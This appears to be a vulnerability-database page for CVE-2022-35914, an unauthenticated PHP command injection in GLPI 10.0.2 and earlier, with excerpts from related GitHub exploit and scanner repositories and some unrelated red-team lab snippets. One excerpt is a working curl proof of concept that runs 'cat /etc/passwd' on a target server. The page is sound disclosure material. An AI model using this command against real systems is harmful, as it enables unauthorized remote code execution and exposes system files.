
CVE-2022-35914

Published: 19/09/2022 Updated: 28/10/2022
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 0

Vulnerability Summary

/vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module for GLPI up to and including 10.0.2 allows PHP code injection.

Vulnerable Product

glpi-project glpi

Exploits

This Metasploit module exploits an unauthenticated PHP command injection vulnerability in GLPI versions 10.0.2 and below to execute a command ...

Github Repositories

Unauthenticated RCE in GLPI 10.0.2

CVE-2022-35914 Unauthenticated RCE in GLPI 10.0.2 PoC

curl -s -d 'sid=foo&hhook=exec&text=cat /etc/passwd' -b 'sid=foo' {{HOST}}/vendor/htmlawed/htmlawed/htmLawedTest.php | egrep '\  \[[0-9]+\] =\>' | sed -E 's/\  \[[0-9]+\] =\> (.*)<br \/>/\1/'

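Some Nuclei PoCs for my own use.

myown-nuclei-poc: Some Nuclei PoCs for my own use. Before you start, be sure to read and agree to the terms in the disclaimer; otherwise do not download, install or use any of the files in this project. ⚡️ Vulnerability list: 2022-10-06 [add] GLPI remote RCE vulnerability - CVE-2022-35914; 2022-10-05 [add] Weaver E-office 10 file upload getshell vulnerability; 2022-09-10 [add] Yonyou NC beanshel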

CVE-2022-35914 PoC. References: github.com/glpi-project/glpi/security/advisories/GHSA-c5gx-789q-5pcr. Usage: pip install -r requirements.txt; ./CVE-2022-35914.py -h. usage: CVE-2022-35914.py [-h] -u URL -c CMD [-f HOOK] [--check] [--user-agent USER_AGENT] CVE-2022-35914 - GLPI - Command injection using a third-party library script op


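CVE-2022-35914 batch detection tool. Create a target.txt file and import the URLs to be checked into it; you can then start batch detection. If an error occurs, turn off your proxy. <!!! Disclaimer: this tool is for authorized use only. Using this project for illegal operations is prohibited; otherwise you bear the consequences yourself !!!>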

Lord Of Active Directory - automatic vulnerable active directory on AWS

Intro: Based on AWS-Redteam-Lab and OCD GOAD. The price for running the lab for 125 hours during one month is approximately 14$. With Free Tier you get 750h of EC2 per month; there are 6 machines, so 125h. But you only get 30Gb of storage, so you need storage for the other 5 VMs: 30Gb * 5 = 150Gb = 14$ / month. Installation: Just like the GOAD project, the installation is in two par

RedTeam Fundamentals. Linux: Linux Fundamentals academy.hackthebox.com/course/preview/linux-fundamentals; Introduction to Networking academy.hackthebox.com/course/preview/introduction-to-networking; Intro to Network Traffic Analysis academy.hackthebox.com/module/details/81; MacOS Fundamentals academy.hackthebox.com/module/details/157; Windo